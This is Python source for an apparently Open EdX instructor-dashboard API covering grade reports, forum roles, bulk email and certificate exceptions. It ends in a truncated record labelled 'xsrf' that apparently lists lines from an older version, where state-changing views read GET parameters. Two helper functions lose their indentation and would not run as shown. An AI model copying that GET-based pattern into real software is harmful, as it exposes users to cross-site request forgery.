            link=HTML('<a href="{}">{}</a>').format(HTML(url), Text(name)),
        ))
    return JsonResponse({'downloads': downloads})
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_finance_admin
def list_financial_report_downloads(_request, course_id):
    """
    List the financial report files available for download for this course.
    """
    course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    report_store = ReportStore.from_config(config_name='FINANCIAL_REPORTS')
    downloads = []
    for name, url in report_store.links_for(course_key):
        downloads.append(dict(
            name=name,
            url=url,
            link=HTML('<a href="{}">{}</a>').format(HTML(url), Text(name)),
        ))
    return JsonResponse({'downloads': downloads})
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def export_ora2_data(request, course_id):
    """
    Push a Celery task that aggregates the course's ORA2 responses into a CSV.
    """
    course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    try:
        instructor_task.api.submit_export_ora2_data(request, course_key)
    except AlreadyRunningError:
        # A previous export is still in flight; just report its existence.
        status = _(
            "An ORA data report generation task is already in "
            "progress. Check the 'Pending Tasks' table "
            "for the status of the task. When completed, the report "
            "will be available for download in the table below."
        )
    else:
        status = _("The ORA data report is being generated.")
    return JsonResponse({"status": status})
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def calculate_grades_csv(request, course_id):
    """
    Start the grade-report CSV task for the course.

    AlreadyRunningError is raised if the course's grades are already being updated.
    """
    course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    try:
        instructor_task.api.submit_calculate_grades_csv(request, course_key)
    except AlreadyRunningError:
        # A report is already in flight; tell the caller where to watch it.
        status = _("The grade report is currently being created."
                   " To view the status of the report, see Pending Tasks below."
                   " You will be able to download the report when it is complete.")
    else:
        status = _("The grade report is being created."
                   " To view the status of the report, see Pending Tasks below.")
    return JsonResponse({"status": status})
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def problem_grade_report(request, course_id):
    """
    Request a CSV showing students' grades for all problems in the course.

    AlreadyRunningError is raised if the course's grades are already being
    updated.
    """
    course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    try:
        instructor_task.api.submit_problem_grade_report(request, course_key)
    except AlreadyRunningError:
        # A report is already in flight; tell the caller where to watch it.
        status = _("A problem grade report is already being generated."
                   " To view the status of the report, see Pending Tasks below."
                   " You will be able to download the report when it is complete.")
    else:
        status = _("The problem grade report is being created."
                   " To view the status of the report, see Pending Tasks below.")
    return JsonResponse({"status": status})
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_post_params('rolename')
def list_forum_members(request, course_id):
    """
    List the forum members holding a given role.

    The requesting user must be at least staff. Staff forum admins may list
    every role EXCEPT FORUM_ROLE_ADMINISTRATOR, which is instructor-only.
    Takes the POST parameter `rolename`.
    """
    course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    course = get_course_by_id(course_key)
    has_instructor_access = has_access(request.user, 'instructor', course)
    has_forum_admin = has_forum_access(
        request.user, course_key, FORUM_ROLE_ADMINISTRATOR
    )
    rolename = request.POST.get('rolename')

    # Default roles require either (staff & forum admin) or (instructor).
    if not (has_forum_admin or has_instructor_access):
        return HttpResponseBadRequest(
            "Operation requires staff & forum admin or instructor access"
        )
    # FORUM_ROLE_ADMINISTRATOR additionally requires instructor access.
    if rolename == FORUM_ROLE_ADMINISTRATOR and not has_instructor_access:
        return HttpResponseBadRequest("Operation requires instructor access.")
    # Only the supported forum roles may be listed.
    if rolename not in [FORUM_ROLE_ADMINISTRATOR, FORUM_ROLE_MODERATOR, FORUM_ROLE_COMMUNITY_TA]:
        return HttpResponseBadRequest(strip_tags(
            "Unrecognized rolename '{}'.".format(rolename)
        ))

    try:
        users = Role.objects.get(name=rolename, course_id=course_key).users.all().order_by('username')
    except Role.DoesNotExist:
        users = []

    def user_info(user):
        """ Convert user to dict for json rendering. """
        return {
            'username': user.username,
            'email': user.email,
            'first_name': user.first_name,
            'last_name': user.last_name,
        }

    return JsonResponse({
        'course_id': course_key.to_deprecated_string(),
        rolename: map(user_info, users),
    })
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_post_params(send_to="sending to whom", subject="subject line", message="message text")
def send_email(request, course_id):
    """
    Send an email to self, staff, or everyone involved in a course.

    POST parameters:
    - 'send_to': which group the email should go to; options are defined by
      the CourseEmail model in lms/djangoapps/bulk_email/models.py
    - 'subject': the email's subject line
    - 'message': the email's body
    """
    course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    if not BulkEmailFlag.feature_enabled(course_key):
        return HttpResponseForbidden("Email is not enabled for this course.")

    targets = json.loads(request.POST.get("send_to"))
    subject = request.POST.get("subject")
    message = request.POST.get("message")

    # Two branding points may come from Microsites: which CourseEmailTemplate
    # to use and the 'from' address. When either is None (not in a Microsite,
    # or undefined in the Microsite config) the normal system defaults apply.
    template_name = microsite.get_value('course_email_template_name')
    from_addr = microsite.get_value('course_email_from_addr')

    # Create the CourseEmail object. This is saved immediately, so that any
    # transaction that has been pending up to this point is also committed.
    try:
        email = CourseEmail.create(
            course_key,
            request.user,
            targets,
            subject, message,
            template_name=template_name,
            from_addr=from_addr
        )
    except ValueError as err:
        return HttpResponseBadRequest(repr(err))

    # Submit the task so the matching InstructorTask record exists for monitoring.
    instructor_task.api.submit_bulk_course_email(request, course_key, email.id)

    return JsonResponse({
        'course_id': course_key.to_deprecated_string(),
        'success': True,
    })
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_post_params(
    unique_student_identifier="email or username of user to change access",
    rolename="the forum role",
    action="'allow' or 'revoke'",
)
@common_exceptions_400
def update_forum_role_membership(request, course_id):
    """
    Modify a user's forum role in the given course.

    The requesting user must be at least staff.
    Staff forum admins can access all roles EXCEPT for FORUM_ROLE_ADMINISTRATOR
    which is limited to instructors.
    No one can revoke an instructor's FORUM_ROLE_ADMINISTRATOR status.

    POST parameters:
    - `unique_student_identifier`: email or username of the target user
    - `rolename` is one of [FORUM_ROLE_ADMINISTRATOR, FORUM_ROLE_MODERATOR, FORUM_ROLE_COMMUNITY_TA]
    - `action` is one of ['allow', 'revoke']

    Returns a JSON payload echoing the course id and the action performed,
    or an HTTP 400 on permission or validation failure.
    """
    course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    course = get_course_by_id(course_id)
    has_instructor_access = has_access(request.user, 'instructor', course)
    has_forum_admin = has_forum_access(
        request.user, course_id, FORUM_ROLE_ADMINISTRATOR
    )
    unique_student_identifier = request.POST.get('unique_student_identifier')
    rolename = request.POST.get('rolename')
    action = request.POST.get('action')
    # default roles require either (staff & forum admin) or (instructor)
    if not (has_forum_admin or has_instructor_access):
        return HttpResponseBadRequest(
            "Operation requires staff & forum admin or instructor access"
        )
    # EXCEPT FORUM_ROLE_ADMINISTRATOR requires (instructor)
    if rolename == FORUM_ROLE_ADMINISTRATOR and not has_instructor_access:
        return HttpResponseBadRequest("Operation requires instructor access.")
    # Reject any role name outside the supported set before touching the DB.
    if rolename not in [FORUM_ROLE_ADMINISTRATOR, FORUM_ROLE_MODERATOR, FORUM_ROLE_COMMUNITY_TA]:
        return HttpResponseBadRequest(strip_tags(
            "Unrecognized rolename '{}'.".format(rolename)
        ))
    user = get_student_from_identifier(unique_student_identifier)
    try:
        update_forum_role(course_id, user, rolename, action)
    except Role.DoesNotExist:
        # The role row may not exist for this course yet.
        return HttpResponseBadRequest("Role does not exist.")
    response_payload = {
        'course_id': course_id.to_deprecated_string(),
        'action': action,
    }
    return JsonResponse(response_payload)
@require_POST
def get_user_invoice_preference(request, course_id):  # pylint: disable=unused-argument
    """
    Return whether the requesting user wants a copy of their invoice.

    Defaults to True when the user has no stored preference; otherwise the
    stored preference string is compared against 'True'.
    """
    stored_value = get_user_preference(request.user, INVOICE_KEY)
    if stored_value is None:
        wants_copy = True
    else:
        wants_copy = stored_value == 'True'
    return JsonResponse({'invoice_copy': wants_copy})
def _display_unit(unit):
"""
Gets string for displaying unit to user.
"""
name = getattr(unit, 'display_name', None)
if name:
return u'{0} ({1})'.format(name, unit.location.to_deprecated_string())
else:
return unit.location.to_deprecated_string()
@handle_dashboard_error
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_post_params('student', 'url', 'due_datetime')
def change_due_date(request, course_id):
    """
    Grants a due date extension to a student for a particular unit.

    POST parameters:
    - `student`: email or username of the student to extend.
    - `url`: location URL identifying the unit whose due date is extended.
    - `due_datetime`: the new due date/time for this student on that unit.

    Returns a JSON-encoded confirmation message.
    """
    course = get_course_by_id(SlashSeparatedCourseKey.from_deprecated_string(course_id))
    student = require_student_from_identifier(request.POST.get('student'))
    unit = find_unit(course, request.POST.get('url'))
    due_date = parse_datetime(request.POST.get('due_datetime'))
    set_due_date_extension(course, unit, student, due_date)
    return JsonResponse(_(
        'Successfully changed due date for student {0} for {1} '
        'to {2}').format(student.profile.name, _display_unit(unit),
                         due_date.strftime('%Y-%m-%d %H:%M')))
@handle_dashboard_error
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_post_params('student', 'url')
def reset_due_date(request, course_id):
    """
    Rescinds a due date extension for a student on a particular unit.

    POST parameters:
    - `student`: email or username of the student whose extension is removed.
    - `url`: location URL identifying the unit.

    Returns a JSON-encoded confirmation message.
    """
    course = get_course_by_id(SlashSeparatedCourseKey.from_deprecated_string(course_id))
    student = require_student_from_identifier(request.POST.get('student'))
    unit = find_unit(course, request.POST.get('url'))
    # Passing None as the date clears this student's extension on the unit.
    set_due_date_extension(course, unit, student, None)
    if not getattr(unit, "due", None):
        # It's possible the normal due date was deleted after an extension was granted:
        return JsonResponse(
            _("Successfully removed invalid due date extension (unit has no due date).")
        )
    original_due_date_str = unit.due.strftime('%Y-%m-%d %H:%M')
    return JsonResponse(_(
        'Successfully reset due date for student {0} for {1} '
        'to {2}').format(student.profile.name, _display_unit(unit),
                         original_due_date_str))
@handle_dashboard_error
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_post_params('url')
def show_unit_extensions(request, course_id):
    """
    Shows all of the students which have due date extensions for the given unit.

    POST parameters:
    - `url`: location URL identifying the unit to report on.

    Returns a JSON dump of the unit's extension records.
    """
    course = get_course_by_id(SlashSeparatedCourseKey.from_deprecated_string(course_id))
    unit = find_unit(course, request.POST.get('url'))
    return JsonResponse(dump_module_extensions(course, unit))
@handle_dashboard_error
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_post_params('student')
def show_student_extensions(request, course_id):
    """
    Shows all of the due date extensions granted to a particular student in a
    particular course.

    POST parameters:
    - `student`: email or username of the student to report on.

    Returns a JSON dump of the student's extension records for the course.
    """
    student = require_student_from_identifier(request.POST.get('student'))
    course = get_course_by_id(SlashSeparatedCourseKey.from_deprecated_string(course_id))
    return JsonResponse(dump_student_extensions(course, student))
def _split_input_list(str_list):
"""
Separate out individual student email from the comma, or space separated string.
e.g.
in: "Lorem@ipsum.dolor, sit@amet.consectetur\nadipiscing@elit.Aenean\r convallis@at.lacus\r, ut@lacinia.Sed"
out: ['Lorem@ipsum.dolor', 'sit@amet.consectetur', 'adipiscing@elit.Aenean', 'convallis@at.lacus', 'ut@lacinia.Sed']
`str_list` is a string coming from an input text area
returns a list of separated values
"""
new_list = re.split(r'[\n\r\s,]', str_list)
new_list = [s.strip() for s in new_list]
new_list = [s for s in new_list if s != '']
return new_list
def _instructor_dash_url(course_key, section=None):
    """Return the URL for a section in the instructor dashboard.

    Arguments:
        course_key (CourseKey): the course whose dashboard to link to.

    Keyword Arguments:
        section (str): optional name of the dashboard section to anchor to.

    Returns:
        unicode: The URL of a section in the instructor dashboard.
    """
    dashboard_url = reverse('instructor_dashboard', kwargs={'course_id': unicode(course_key)})
    if section is None:
        return dashboard_url
    return dashboard_url + u'#view-{section}'.format(section=section)
@require_global_staff
@require_POST
def generate_example_certificates(request, course_id=None):  # pylint: disable=unused-argument
    """Start generating a set of example certificates.

    Example certificates are used to verify that certificates have
    been configured correctly for the course.

    Redirects back to the instructor dashboard's certificates section once
    certificate generation has begun.
    """
    course_key = CourseKey.from_string(course_id)
    certs_api.generate_example_certificates(course_key)
    return redirect(_instructor_dash_url(course_key, section='certificates'))
@require_global_staff
@require_POST
def enable_certificate_generation(request, course_id=None):
    """Enable/disable self-generated certificates for a course.

    Once self-generated certificates have been enabled, students
    who have passed the course will be able to generate certificates.

    Redirects back to the instructor dashboard's certificates section once
    the setting has been updated.
    """
    course_key = CourseKey.from_string(course_id)
    # The form posts the literal string 'true' when the box is checked; any
    # other value (or a missing parameter) disables generation.
    is_enabled = (request.POST.get('certificates-enabled', 'false') == 'true')
    certs_api.set_cert_generation_enabled(course_key, is_enabled)
    return redirect(_instructor_dash_url(course_key, section='certificates'))
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_POST
def mark_student_can_skip_entrance_exam(request, course_id):  # pylint: disable=invalid-name
    """
    Mark a student to skip entrance exam.

    Takes `unique_student_identifier` as required POST parameter.

    Returns a JSON payload whose message states whether the student was newly
    marked or was already allowed to skip the exam.
    """
    course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    student_identifier = request.POST.get('unique_student_identifier')
    student = get_student_from_identifier(student_identifier)
    # `created` distinguishes a fresh opt-out from one that already existed.
    __, created = EntranceExamConfiguration.objects.get_or_create(user=student, course_id=course_id)
    if created:
        message = _('This student (%s) will skip the entrance exam.') % student_identifier
    else:
        message = _('This student (%s) is already allowed to skip the entrance exam.') % student_identifier
    response_payload = {
        'message': message,
    }
    return JsonResponse(response_payload)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_global_staff
@require_POST
def start_certificate_generation(request, course_id):
    """
    Start generating certificates for all students enrolled in given course.

    Returns a JSON payload containing a status message and the id of the
    asynchronous instructor task that performs the generation.
    """
    course_key = CourseKey.from_string(course_id)
    task = instructor_task.api.generate_certificates_for_students(request, course_key)
    message = _('Certificate generation task for all students of this course has been started. '
                'You can view the status of the generation task in the "Pending Tasks" section.')
    response_payload = {
        'message': message,
        'task_id': task.task_id
    }
    return JsonResponse(response_payload)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_global_staff
@require_POST
def start_certificate_regeneration(request, course_id):
    """
    Start regenerating certificates for students whose certificate statuses lie with in 'certificate_statuses'
    entry in POST data.

    Responds with HTTP 400 when no statuses are selected, when an unsupported
    status is selected, or when a regeneration task is already running.
    """
    course_key = CourseKey.from_string(course_id)
    certificates_statuses = request.POST.getlist('certificate_statuses', [])
    if not certificates_statuses:
        return JsonResponse(
            {'message': _('Please select one or more certificate statuses that require certificate regeneration.')},
            status=400
        )
    # Check if the selected statuses are allowed
    allowed_statuses = [CertificateStatuses.downloadable, CertificateStatuses.error, CertificateStatuses.notpassing]
    if not set(certificates_statuses).issubset(allowed_statuses):
        return JsonResponse(
            {'message': _('Please select certificate statuses from the list only.')},
            status=400
        )
    try:
        instructor_task.api.regenerate_certificates(request, course_key, certificates_statuses)
    except AlreadyRunningError as error:
        # A regeneration task for this course is already in flight.
        return JsonResponse({'message': error.message}, status=400)
    response_payload = {
        'message': _('Certificate regeneration task has been started. '
                     'You can view the status of the generation task in the "Pending Tasks" section.'),
        'success': True
    }
    return JsonResponse(response_payload)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_global_staff
@require_http_methods(['POST', 'DELETE'])
def certificate_exception_view(request, course_id):
    """
    Add/Remove students to/from certificate white list.

    POST adds the student named in the request body to the white list and
    returns the created exception; DELETE removes the student's exception and
    returns an empty HTTP 204 response.

    :param request: HttpRequest object
    :param course_id: course identifier of the course for whom to add/remove certificates exception.
    :return: JsonResponse object with success/error message or certificate exception data.
    """
    course_key = CourseKey.from_string(course_id)
    # Validate request data and return error response in case of invalid data
    try:
        certificate_exception, student = parse_request_data_and_get_user(request, course_key)
    except ValueError as error:
        return JsonResponse({'success': False, 'message': error.message}, status=400)
    # Add new Certificate Exception for the student passed in request data
    if request.method == 'POST':
        try:
            exception = add_certificate_exception(course_key, student, certificate_exception)
        except ValueError as error:
            return JsonResponse({'success': False, 'message': error.message}, status=400)
        return JsonResponse(exception)
    # Remove Certificate Exception for the student passed in request data
    elif request.method == 'DELETE':
        try:
            remove_certificate_exception(course_key, student)
        except ValueError as error:
            return JsonResponse({'success': False, 'message': error.message}, status=400)
        return JsonResponse({}, status=204)
def add_certificate_exception(course_key, student, certificate_exception):
    """
    Add a certificate exception to CertificateWhitelist table.

    Raises ValueError in case Student is already white listed.

    :param course_key: identifier of the course whose certificate exception will be added.
    :param student: User object whose certificate exception will be added.
    :param certificate_exception: A dict object containing certificate exception info.
    :return: CertificateWhitelist item in dict format containing certificate exception info.
    """
    # Refuse duplicates: a student may appear on the white list only once.
    if len(CertificateWhitelist.get_certificate_white_list(course_key, student)) > 0:
        raise ValueError(
            _("Student (username/email={user}) already in certificate exception list.").format(user=student.username)
        )

    white_list_entry, __ = CertificateWhitelist.objects.get_or_create(
        user=student,
        course_id=course_key,
        defaults={
            'whitelist': True,
            'notes': certificate_exception.get('notes', '')
        }
    )

    # Fetch any already-downloadable certificate so the UI can show when one
    # was generated for this student.
    downloadable_cert = GeneratedCertificate.eligible_certificates.filter(
        user=student,
        course_id=course_key,
        status=CertificateStatuses.downloadable,
    ).first()

    return {
        'id': white_list_entry.id,
        'user_email': student.email,
        'user_name': student.username,
        'user_id': student.id,
        'certificate_generated': downloadable_cert and downloadable_cert.created_date.strftime("%B %d, %Y"),
        'created': white_list_entry.created.strftime("%A, %B %d, %Y"),
    }
def remove_certificate_exception(course_key, student):
    """
    Remove certificate exception for given course and student from CertificateWhitelist table and
    invalidate its GeneratedCertificate if present.

    Raises ValueError in case no exception exists for the student in the given course.

    :param course_key: identifier of the course whose certificate exception needs to be removed.
    :param student: User object whose certificate exception needs to be removed.
    :return: None
    """
    try:
        certificate_exception = CertificateWhitelist.objects.get(user=student, course_id=course_key)
    except ObjectDoesNotExist:
        raise ValueError(
            _('Certificate exception (user={user}) does not exist in certificate white list. '
              'Please refresh the page and try again.').format(user=student.username)
        )
    try:
        # Invalidate the certificate first, then delete the white-list row, so
        # a failure to invalidate leaves the exception record intact.
        generated_certificate = GeneratedCertificate.objects.get(  # pylint: disable=no-member
            user=student,
            course_id=course_key
        )
        generated_certificate.invalidate()
        log.info(
            u'Certificate invalidated for %s in course %s when removed from certificate exception list',
            student.username,
            course_key
        )
    except ObjectDoesNotExist:
        # Certificate has not been generated yet, so just remove the certificate exception from white list
        pass
    certificate_exception.delete()
def parse_request_data_and_get_user(request, course_key):
    """
    Parse request data into Certificate Exception and User object.

    Certificate Exception is the dict object containing information about certificate exception.

    :param request: HttpRequest object carrying a JSON body.
    :param course_key: Course Identifier of the course for whom to process certificate exception
    :return: key-value pairs containing certificate exception data and User object
    """
    certificate_exception = parse_request_data(request)

    # Accept either the username or the email field; at least one is required.
    identifier = certificate_exception.get('user_name', '') or certificate_exception.get('user_email', '')
    if not identifier:
        raise ValueError(_('Student username/email field is required and can not be empty. '
                           'Kindly fill in username/email and then press "Add to Exception List" button.'))

    return certificate_exception, get_student(identifier, course_key)
def parse_request_data(request):
    """
    Deserialize the request body as JSON.

    An empty or missing body is treated as an empty JSON object. Raises
    ValueError with a user-facing message when the body is not valid JSON.

    :param request: HttpRequest request object.
    :return: dict object containing parsed json data.
    """
    raw_body = request.body or '{}'
    try:
        return json.loads(raw_body)
    except ValueError:
        raise ValueError(_('The record is not in the correct format. Please add a valid username or email address.'))
def get_student(username_or_email, course_key):
    """
    Retrieve and return User object from db, raise ValueError
    if the user does not exist or is not enrolled in the given course.

    :param username_or_email: String containing either user name or email of the student.
    :param course_key: CourseKey object identifying the current course.
    :return: User object
    """
    try:
        student = get_user_by_username_or_email(username_or_email)
    except ObjectDoesNotExist:
        raise ValueError(_("{user} does not exist in the LMS. Please check your spelling and retry.").format(
            user=username_or_email
        ))
    # Make Sure the given student is enrolled in the course
    if not CourseEnrollment.is_enrolled(student, course_key):
        raise ValueError(_("{user} is not enrolled in this course. Please check your spelling and retry.")
                         .format(user=username_or_email))
    return student
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_global_staff
@require_POST
def generate_certificate_exceptions(request, course_id, generate_for=None):
    """
    Generate Certificate for students in the Certificate White List.

    :param request: HttpRequest object,
    :param course_id: course identifier of the course for whom to generate certificates
    :param generate_for: string to identify whether to generate certificates for 'all' or 'new'
            additions to the certificate white-list
    :return: JsonResponse object containing success/failure message and certificate exception data
    """
    course_key = CourseKey.from_string(course_id)
    if generate_for == 'all':
        # Generate Certificates for all white listed students
        students = 'all_whitelisted'
    elif generate_for == 'new':
        students = 'whitelisted_not_generated'
    else:
        # Invalid data, generate_for must be present for all certificate exceptions
        return JsonResponse(
            {
                'success': False,
                'message': _('Invalid data, generate_for must be "new" or "all".'),
            },
            status=400
        )
    # Kick off the asynchronous instructor task for the selected student set.
    instructor_task.api.generate_certificates_for_students(request, course_key, student_set=students)
    response_payload = {
        'success': True,
        'message': _('Certificate generation started for white listed students.'),
    }
    return JsonResponse(response_payload)
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_global_staff
@require_POST
def generate_bulk_certificate_exceptions(request, course_id):  # pylint: disable=invalid-name
    """
    Add Students to certificate white list from the uploaded csv file.

    The csv must contain exactly two columns per row (username/email, notes);
    blank rows are skipped silently.

    :return response in dict format.
    {
        general_errors: [errors related to csv file e.g. csv uploading, csv attachment, content reading etc. ],
        row_errors: {
            data_format_error: [users/data in csv file that are not well formatted],
            user_not_exist: [csv with none exiting users in LMS system],
            user_already_white_listed: [users that are already white listed],
            user_not_enrolled: [rows with not enrolled users in the given course]
        },
        success: [list of successfully added users to the certificate white list model]
    }
    """
    user_index = 0
    notes_index = 1
    row_errors_key = ['data_format_error', 'user_not_exist', 'user_already_white_listed', 'user_not_enrolled']
    course_key = CourseKey.from_string(course_id)
    students, general_errors, success = [], [], []
    row_errors = {key: [] for key in row_errors_key}

    def build_row_errors(key, _user, row_count):
        """
        inner method to build dict of csv data as row errors.
        """
        row_errors[key].append(_('user "{user}" in row# {row}').format(user=_user, row=row_count))

    if 'students_list' in request.FILES:
        # Bind the name before the try block so the finally clause cannot hit
        # an UnboundLocalError if fetching the upload itself raises.
        upload_file = None
        try:
            upload_file = request.FILES.get('students_list')
            if upload_file.name.endswith('.csv'):
                students = [row for row in csv.reader(upload_file.read().splitlines())]
            else:
                general_errors.append(_('Make sure that the file you upload is in CSV format with no '
                                        'extraneous characters or rows.'))
        except Exception:  # pylint: disable=broad-except
            general_errors.append(_('Could not read uploaded file.'))
        finally:
            if upload_file is not None:
                upload_file.close()

        row_num = 0
        for student in students:
            row_num += 1
            # verify that we have exactly two column in every row either email or username and notes but allow for
            # blank lines
            if len(student) != 2:
                if len(student) > 0:
                    build_row_errors('data_format_error', student[user_index], row_num)
                    log.info(u'invalid data/format in csv row# %s', row_num)
                continue

            user = student[user_index]
            try:
                user = get_user_by_username_or_email(user)
            except ObjectDoesNotExist:
                build_row_errors('user_not_exist', user, row_num)
                log.info(u'student %s does not exist', user)
            else:
                if len(CertificateWhitelist.get_certificate_white_list(course_key, user)) > 0:
                    build_row_errors('user_already_white_listed', user, row_num)
                    log.warning(u'student %s already exist.', user.username)
                # make sure user is enrolled in course
                elif not CourseEnrollment.is_enrolled(user, course_key):
                    build_row_errors('user_not_enrolled', user, row_num)
                    log.warning(u'student %s is not enrolled in course.', user.username)
                else:
                    CertificateWhitelist.objects.create(
                        user=user,
                        course_id=course_key,
                        whitelist=True,
                        notes=student[notes_index]
                    )
                    success.append(_('user "{username}" in row# {row}').format(username=user.username, row=row_num))
    else:
        general_errors.append(_('File is not attached.'))

    results = {
        'general_errors': general_errors,
        'row_errors': row_errors,
        'success': success
    }
    return JsonResponse(results)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_global_staff
@require_http_methods(['POST', 'DELETE'])
def certificate_invalidation_view(request, course_id):
    """
    Invalidate/Re-Validate students to/from certificate.

    POST invalidates the named student's certificate and returns the created
    invalidation record; DELETE re-validates it and returns an empty 204.

    :param request: HttpRequest object
    :param course_id: course identifier of the course for whom to add/remove certificates exception.
    :return: JsonResponse object with success/error message or certificate invalidation data.
    """
    course_key = CourseKey.from_string(course_id)
    # Validate request data and return error response in case of invalid data
    try:
        certificate_invalidation_data = parse_request_data(request)
        certificate = validate_request_data_and_get_certificate(certificate_invalidation_data, course_key)
    except ValueError as error:
        return JsonResponse({'message': error.message}, status=400)
    # Invalidate certificate of the given student for the course course
    if request.method == 'POST':
        try:
            certificate_invalidation = invalidate_certificate(request, certificate, certificate_invalidation_data)
        except ValueError as error:
            return JsonResponse({'message': error.message}, status=400)
        return JsonResponse(certificate_invalidation)
    # Re-Validate student certificate for the course course
    elif request.method == 'DELETE':
        try:
            re_validate_certificate(request, course_key, certificate)
        except ValueError as error:
            return JsonResponse({'message': error.message}, status=400)
        return JsonResponse({}, status=204)
def invalidate_certificate(request, generated_certificate, certificate_invalidation_data):
    """
    Invalidate given GeneratedCertificate and add CertificateInvalidation record for future reference or re-validation.

    Raises ValueError when the certificate is already invalidated or is not a
    valid certificate.

    :param request: HttpRequest object
    :param generated_certificate: GeneratedCertificate object, the certificate we want to invalidate
    :param certificate_invalidation_data: dict object containing data for CertificateInvalidation.
    :return: dict object containing updated certificate invalidation data.
    """
    # Reject a second invalidation of the same certificate.
    if len(CertificateInvalidation.get_certificate_invalidations(
            generated_certificate.course_id,
            generated_certificate.user,
    )) > 0:
        raise ValueError(
            _("Certificate of {user} has already been invalidated. Please check your spelling and retry.").format(
                user=generated_certificate.user.username,
            )
        )
    # Verify that certificate user wants to invalidate is a valid one.
    if not generated_certificate.is_valid():
        raise ValueError(
            _("Certificate for student {user} is already invalid, kindly verify that certificate was generated "
              "for this student and then proceed.").format(user=generated_certificate.user.username)
        )
    # Add CertificateInvalidation record for future reference or re-validation
    certificate_invalidation, __ = CertificateInvalidation.objects.update_or_create(
        generated_certificate=generated_certificate,
        defaults={
            'invalidated_by': request.user,
            'notes': certificate_invalidation_data.get("notes", ""),
            'active': True,
        }
    )
    # Invalidate GeneratedCertificate
    generated_certificate.invalidate()
    return {
        'id': certificate_invalidation.id,
        'user': certificate_invalidation.generated_certificate.user.username,
        'invalidated_by': certificate_invalidation.invalidated_by.username,
        'created': certificate_invalidation.created.strftime("%B %d, %Y"),
        'notes': certificate_invalidation.notes,
    }
def re_validate_certificate(request, course_key, generated_certificate):
    """
    Remove certificate invalidation from db and start certificate generation task for this student.

    Raises ValueError if no certificate invalidation is present.

    :param request: HttpRequest object
    :param course_key: CourseKey object identifying the current course.
    :param generated_certificate: GeneratedCertificate object of the student for the given course
    """
    try:
        # Fetch CertificateInvalidation object
        certificate_invalidation = CertificateInvalidation.objects.get(generated_certificate=generated_certificate)
    except ObjectDoesNotExist:
        raise ValueError(_("Certificate Invalidation does not exist, Please refresh the page and try again."))
    else:
        # Deactivate certificate invalidation if it was fetched successfully.
        certificate_invalidation.deactivate()
    # We need to generate certificate only for a single student here
    student = certificate_invalidation.generated_certificate.user
    instructor_task.api.generate_certificates_for_students(
        request, course_key, student_set="specific_student", specific_student_id=student.id
    )
def validate_request_data_and_get_certificate(certificate_invalidation, course_key):
    """
    Fetch and return GeneratedCertificate of the student passed in request data for the given course.

    Raises ValueError in case of missing student username/email or
    if student does not have certificate for the given course.

    :param certificate_invalidation: dict containing certificate invalidation data
    :param course_key: CourseKey object identifying the current course.
    :return: GeneratedCertificate object of the student for the given course
    """
    username_or_email = certificate_invalidation.get("user")
    if not username_or_email:
        raise ValueError(
            _('Student username/email field is required and can not be empty. '
              'Kindly fill in username/email and then press "Invalidate Certificate" button.')
        )

    student = get_student(username_or_email, course_key)
    certificate = GeneratedCertificate.certificate_for_student(student, course_key)
    if certificate:
        return certificate
    raise ValueError(_(
        "The student {student} does not have certificate for the course {course}. Kindly verify student "
        "username/email and the selected course are correct and try again."
    ).format(student=student.username, course=course_key.course))
| xsrf | {
"code": [
"def require_query_params(*args, **kwargs):",
" Checks for required paremters or renders a 400 error.",
" `args` is a *list of required GET parameter names.",
" to string explanations of the parameter",
" required_params = []",
" required_params += [(arg, None) for arg in args]",
" required_params += [(key, kwargs[key]) for key in kwargs]",
" request = args[0]",
" error_response_data = {",
" 'error': 'Missing required query parameter(s)',",
" 'parameters': [],",
" 'info': {},",
" }",
" for (param, extra) in required_params:",
" default = object()",
" if request.GET.get(param, default) == default:",
" error_response_data['parameters'].append(param)",
" error_response_data['info'][param] = extra",
" if len(error_response_data['parameters']) > 0:",
" return JsonResponse(error_response_data, status=400)",
" else:",
" return func(*args, **kwargs)",
" return wrapped",
" return decorator",
" POST parameters rather than GET parameters.",
"@require_query_params(",
" user = get_student_from_identifier(request.GET.get('unique_student_identifier'))",
